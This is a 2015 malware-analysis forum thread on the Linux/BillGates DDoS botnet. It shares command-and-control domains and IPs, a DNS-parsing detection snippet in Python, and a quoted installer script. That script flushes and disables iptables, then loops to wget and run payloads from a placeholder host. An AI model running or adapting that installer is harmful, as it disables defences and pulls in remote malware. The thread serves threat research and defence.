Linux/BillGates

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Tue Jan 13, 2015 11:56 am

Usual one, VT: https://www.virustotal.com/en/file/1808 ... 421148489/
With the "active" infection effort using this script installer (note the semi-automation trail):

Code:

#!/bin/bash
#00000000000
#000000000000
#0000000000
#========================================================================
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/mmm*
while true

do
    ps aux | grep mmm | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 10
    else
		ls -l /tmp/mmm
			if [ $? -eq 0 ];then
			 /tmp/mmm
			else
    cd /tmp/;wget http://IP:PORT/mmm ; chmod a+x mmm;/tmp/mmm
	fi
   fi
    ps aux | grep fk.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 10
    else
	ls -l /tmp/fk.sh
	if [ $? -eq 0];then
	 /tmp/fk.sh
	else
cd /tmp;wget http://IP:PORT/fk.sh ; chmod a+x fk.sh;/tmp/fk.sh
        fi
   fi
done
It uses a domain as the CNC to knock down:

Code:

ma.wudikkk.com. 600 IN A 120.27.28.199
wudikkk.com. 3600 IN NS dns10.hichina.com.
wudikkk.com. 3600 IN NS dns9.hichina.com 
syscall PoC:

Code:

sendto(5, "\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1", 32, 0, 
{sa_family=AF_INET, sin_port=htons(53),sin_addr=inet_addr("202.238.95.24")}, 16);
CNC IP/port is up and live, feel free to play :-)

Code:

120.27.28.199:1991 
Located at: 120.27.28.199||37963 | 120.27.0.0/17 | CNNIC-ALIBABA-CN-NET | CN | ALIYUN.COM | ALIYUN COMPUTING CO. LTD
Sample spotted+contributed by malmouse - #MalwareMustDie!
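As an added defender's example (not code from the thread or from the malware), this Python snippet decodes the DNS query bytes captured in the sendto() above (the C octal escapes translated to hex), recovers the queried name, and checks it against a watchlist built from the CNC domains posted in this thread; the function names and the watchlist variable are mine, the domain values come from the posts.

```python
import struct

# Payload of the sendto() in the strace line above, C octal escapes decoded
# to hex: txid 0xdbfb, flags 0x0100, QDCOUNT 1, one A question, 32 bytes.
CAPTURED_QUERY = (
    b"\xdb\xfb\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
    b"\x02ma\x07wudikkk\x03com\x00\x00\x01\x00\x01"
)
# Parent zones of the CNC hostnames posted in this thread.
CNC_WATCHLIST = {"wudikkk.com", "appledoesnt.com", "f1122.org"}

def parse_dns_query(packet: bytes) -> dict:
    """Decode an uncompressed DNS query; raise ValueError on malformed input."""
    if len(packet) < 12:
        raise ValueError("too short for a DNS header")
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question, got %d" % qdcount)
    labels, pos = [], 12
    while True:
        if pos >= len(packet):
            raise ValueError("truncated QNAME")
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:  # a plain query name carries no compression pointers
            raise ValueError("unexpected compression pointer in QNAME")
        if pos + length > len(packet):
            raise ValueError("truncated QNAME label")
        labels.append(packet[pos:pos + length].decode("ascii", "replace"))
        pos += length
    if pos + 4 > len(packet):
        raise ValueError("truncated question section")
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return {"id": txid, "flags": flags, "qname": ".".join(labels).lower(), "qtype": qtype, "qclass": qclass}

def matches_watchlist(qname: str, watchlist=CNC_WATCHLIST):
    """Return the watchlist zone that qname equals or sits under, else None."""
    q = qname.rstrip(".").lower()
    for zone in watchlist:
        if q == zone or q.endswith("." + zone):
            return zone
    return None

if __name__ == "__main__":
    q = parse_dns_query(CAPTURED_QUERY)
    print("%#06x %s type %d -> %s" % (q["id"], q["qname"], q["qtype"], matches_watchlist(q["qname"])))
```

The same parser can be pointed at the UDP payloads of a pcap to flag hosts that repeatedly look up the watchlisted zones, which is the resolution pattern kekieres describes later in the thread.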

kekieres
Posts: 10
Joined: Tue Feb 26, 2013 11:48 am

Re: Linux/BillGates

Post by kekieres » Wed Jan 14, 2015 6:36 pm

On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C&C? Just executing in a sandbox and monitoring the traffic? Or using strace? Both?

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Jan 15, 2015 12:51 am

kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C&C? Just executing in a sandbox and monitoring the traffic? Or using strace? Both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.

kekieres
Posts: 10
Joined: Tue Feb 26, 2013 11:48 am

Re: Linux/BillGates

Post by kekieres » Thu Jan 15, 2015 9:04 am

unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C&C? Just executing in a sandbox and monitoring the traffic? Or using strace? Both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.
I truly understand you.
Well, I did it my way and I can say that the sample connects to 218.90.200.250 on port tcp/250000.
As far as I've seen and understood, it's just reporting to the C&C.

Just after that contact, it's constantly trying to resolve the hostname fk.appledoesnt.com, which at the moment does not exist.

In case someone wants the pcap just contact me.

Just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP addresses. In my sample they are all located in Asia. Does anyone have a clue what they are?

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Jan 17, 2015 4:58 pm

BillGates DDoSer with speedy infection, suspected to be Shellshock-driven.
VT: https://www.virustotal.com/en/file/7a91 ... 421512473/
CNC is in USA:

Code:

Sun Jan 18 01:45:24 JST 2015
Connection to 23.228.102.133 25001 port succeeded!
TCP MMD.Kicks.PRC.Moronz:xxxx->23.228.102.133:25001 (ESTABLISHED)
at ASN: 46573 | 23.228.102.0/24 | GLOBAL-FRAG-SERVERS | USA | ARIEL MICHAELI
#MalwareMustDie!

Antelox
Posts: 253
Joined: Sun Mar 21, 2010 10:38 pm

Re: Linux/BillGates

Post by Antelox » Thu Jan 22, 2015 8:05 pm

Hi,
my article about Kippo honeypot and BillGates botnet statistics with another C&C (samples 3 weeks old):

Inside a Kippo honeypot: how the billgates botnet spreads

Regards,

Antelox

malwarelabs
Posts: 44
Joined: Tue Dec 10, 2013 9:07 am

Re: Linux/BillGates

Post by malwarelabs » Thu Feb 19, 2015 10:08 am

130 BillGates samples attached
pwd: infected

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Wed Jul 01, 2015 10:59 am

Linux/BillGates was used by the ChinaZ actor as a payload, together with Linux/.Iptables|x.
Report http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT: https://www.virustotal.com/en/file/067f ... /analysis/

Code:

CNC Info:
Hostname: udp.f1122.org
IP: 61.160.213.18
Port: 25001

61.160.213.18| - |23650 | 61.160.213.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn
ChinaNet Jiangsu Province Network
{
"ip": "61.160.213.18",
"hostname": "udp.f1122.org",
"city": "Nanjing",
"region": "Jiangsu",
"country": "CN",
"loc": "32.0617,118.7778",
"org": "AS23650 AS Number for CHINANET jiangsu province backbone"
}

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Jul 03, 2015 9:48 pm

Attacking routers with SSH brute force.

Using a hacked PC to attack, obviously.

The panel on that PC, weaponized with two ELF malware (MIPS & x32).

CNC: 123.249.45.210:36000

VT:
https://www.virustotal.com/en/file/6c39 ... 435959461/
https://www.virustotal.com/en/file/9857 ... 435959488/

#MalwareMUSTDie!!

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Jul 04, 2015 10:45 pm

kekieres wrote:
unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
(snipped)
Just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP addresses. In my sample they are all located in Asia. Does anyone have a clue what they are?
Those IPs are a DNS amplifier IP list used for DNS flood attacks. Linux/BillGates malware has this function.

Illustration: [image attached]
